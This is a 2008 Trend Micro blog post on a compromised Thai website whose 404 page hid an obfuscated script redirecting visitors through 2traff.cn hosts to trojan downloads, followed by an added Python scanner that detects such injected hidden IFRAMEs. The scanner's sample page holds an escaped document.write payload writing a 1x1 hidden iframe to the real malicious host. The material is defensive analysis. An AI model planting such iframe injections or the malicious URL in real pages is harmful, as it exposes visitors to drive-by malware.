Monday, March 10, 2008 12:00 PM
cmosby
Yet another Thai Site compromised by EU Malware Authors | TrendLabs | Malware Blog - by Trend Micro
March 9th, 2008 by Joseph Pacamarra
Research Project Manager Ivan Macalintal reported a few hours ago that another Thailand-based Web hosting site appears to have been compromised to serve malware.
The APAC regional TrendLabs team immediately probed and analyzed the attack layout for the ill-fated www.ictbannok.com, and we identified a tricky injection which had been prematurely implemented.
Based on our analysis, the main site was just about to be heavily laden with scripts when it was first reported. Going further, since it looked like a dead end when we tried a different avenue, and since the main page itself looked just like a site with a script gone bad, we found this:
|
http://www.ictbannok.com /*
(cloaked behind a 404 error page that is still heavily laden with an encrypted script, which leads to)
|
hxxp://www.ictbannok.com.96fad701b73f1f53.2traff.cn/traff2.cn/
|
Host location: Estonia
|
Host location: European Union [Russian Federation]
|
The following malicious files are set to drop at this point: TROJ_SHEUR.DZJ and TROJ_INJECT.IS
|
Host location: Ukraine
|
TSPY_LDPINCH.JR
These tiers were brought down 20 minutes or less after the probing was done. Too late for the authors of the attack: their tracks were traced back, pinpointing the actual file they were hoping to deploy using obfuscation and an IFRAME as the drop-off point.
With a coordinated effort from APAC-RTL, spearheaded by Oscar R., the Trend Micro Thailand office (Wan K.) and Kitisak J. of ThaiCert, the ictbannok.com site administrator was advised of the incident and had the site cleaned in no time. Now it's back to its regular business.
Trend Micro has already detected these files since the release of malware control patch number 5.144.05, using scan engine 8.5001002 or later.
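As an added example (not part of the original TrendLabs post), the following Python scanner shows how the injection pattern described above can be caught in a page's HTML: an IFRAME emitted by an obfuscated document.write(unescape(...)) call, sized 1x1 or hidden with CSS, and pointing at a host that starts with the compromised site's own name but belongs to a different domain. The sample 404 page, the benign partner host ads.example-partner.com and all function names are constructed for this illustration; only the redirect hostname is taken from the post.

```python
"""Scan an HTML page for injected IFRAMEs: script-written via an obfuscated
document.write(unescape(...)) call, hidden from the visitor, and hosted on a
domain that merely borrows the compromised site's own host name as a prefix."""
import re
from urllib.parse import unquote, urlparse

# Constructed sample (not the real ictbannok.com page): a 404 page carrying one
# visible partner iframe and one escaped, script-written, 1x1 hidden iframe.
SAMPLE_404_PAGE = r"""<html><head><title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<iframe src="http://ads.example-partner.com/banner.html" width="468" height="60"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fwww.ictbannok.com.96fad701b73f1f53.2traff.cn%2Ftraff2.cn%2F%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'))</script>
</body></html>"""

# document.write('...') or document.write(unescape('...')); group 3 is the payload.
DOC_WRITE_RE = re.compile(
    r"document\.write\s*\(\s*(unescape\s*\(\s*)?(['\"])(.*?)\2\s*\)?\s*\)",
    re.IGNORECASE | re.DOTALL)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"([\w-]+)\s*=\s*(['\"])(.*?)\2", re.DOTALL)


def js_unescape(s):
    """Decode what JavaScript's unescape() would: %uXXXX first, then %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decoded_script_writes(html):
    """Return the HTML fragments that document.write() calls in the page would emit."""
    return [js_unescape(m.group(3)) for m in DOC_WRITE_RE.finditer(html)]


def parse_iframes(fragment):
    """Return one attribute dict (lower-cased names) per <iframe> tag in the fragment."""
    return [{k.lower(): v for k, _q, v in ATTR_RE.findall(m.group(1))}
            for m in IFRAME_RE.finditer(fragment)]


def is_hidden(attrs):
    """Frames of 1x1 or smaller, or hidden by CSS, are not meant to be seen."""
    def dim(name):
        return int(re.sub(r"[^\d]", "", attrs.get(name, "")) or 999)
    style = attrs.get("style", "").replace(" ", "").lower()
    return (dim("width") <= 1 or dim("height") <= 1
            or "visibility:hidden" in style or "display:none" in style)


def registered_domain(host):
    """Crude registrable-domain guess: the last two labels (fine for .com / .cn)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def borrows_site_name(iframe_host, page_host):
    """True when the frame's host starts with the page's own host name but sits
    under a different registered domain, e.g. www.ictbannok.com.<hex>.2traff.cn."""
    iframe_host, page_host = iframe_host.lower(), page_host.lower()
    return (iframe_host.startswith(page_host + ".")
            and registered_domain(iframe_host) != registered_domain(page_host))


def scan_page(html, page_host):
    """Report every iframe, static or script-written, with the reasons it looks injected."""
    sources = [("static", html)]
    sources += [("document.write", frag) for frag in decoded_script_writes(html)]
    findings = []
    for origin, fragment in sources:
        for attrs in parse_iframes(fragment):
            src = attrs.get("src", "")
            host = urlparse(src).hostname or ""
            reasons = []
            if origin == "document.write":
                reasons.append("written by obfuscated script")
            if is_hidden(attrs):
                reasons.append("hidden 1x1/invisible frame")
            if borrows_site_name(host, page_host):
                reasons.append("host borrows site name: " + host)
            findings.append({"src": src, "origin": origin, "reasons": reasons})
    return findings


def suspicious_iframes(html, page_host):
    """Only the iframes that triggered at least one indicator."""
    return [f for f in scan_page(html, page_host) if f["reasons"]]


if __name__ == "__main__":
    for f in scan_page(SAMPLE_404_PAGE, "www.ictbannok.com"):
        flag = "SUSPICIOUS" if f["reasons"] else "ok"
        print(f"{flag:10} {f['src']}  {'; '.join(f['reasons'])}")
```

Run against the constructed page, the partner banner passes while the script-written frame trips all three indicators. Decoding the document.write payload before looking for iframes is the step that matters: a plain grep for `<iframe` over the raw 404 page would see only the benign one. The host-prefix check is deliberately conservative (it needs the page's own host name followed by a dot, and a different registered domain), so it will not flag the site's own subdomains.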
Source: Yet another Thai Site compromised by EU Malware Authors | TrendLabs | Malware Blog - by Trend Micro
Filed under: Security and Anti-Virus, Internet Hacks, Cybercrime